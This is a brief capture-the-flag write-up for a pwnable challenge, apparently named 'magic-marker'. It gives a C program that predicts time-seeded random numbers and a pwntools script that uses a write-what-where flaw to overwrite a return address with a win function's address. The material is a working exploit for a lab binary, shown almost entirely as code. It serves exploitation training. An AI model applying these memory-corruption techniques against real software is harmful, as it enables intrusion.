Tags: write-what-where pwn pwnable
Rating: 1.5
timer.c
```C
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
int main() {
time_t t = time(0);
srand(t);
int n1 = rand() % 40;
int n2 = rand() % 40;
printf("%d\n", n1);
printf("%d\n", n2);
return 0;
}
```
```python
from pwn import *
def pwn():
n1 = int(h.recvline().strip())
n2 = int(h.recvline().strip())
r.sendline(b'jump up and down')
# decrease first random number to zero
for x in range(n1):
r.recvuntil(b'up):')
r.sendline(b'x')
r.sendafter(b'write?', b'A'*28 + p32(8))
r.recvuntil(b'up):')
r.sendline(b'w')
# decrease second random number to -1
for x in range(n2+1):
r.recvuntil(b'up):')
r.sendline(b'x')
r.sendafter(b'write?', b'A'*28 + p32(1))
r.recvuntil(b'up):')
r.sendline(b'a')
# write win function address to return address
r.recvuntil(b'up):')
r.sendline(b'x')
r.sendlineafter(b'write?', b'A' * 8 + p64(0x400fa0))
print(r.recvall())
r.interactive()
if __name__ == '__main__':
h = process('./timer')
if len(sys.argv) > 1:
r = remote(sys.argv[1], int(sys.argv[2]))
else:
r = process(['./magic-marker'])
print(util.proc.pidof(r))
pwn()
```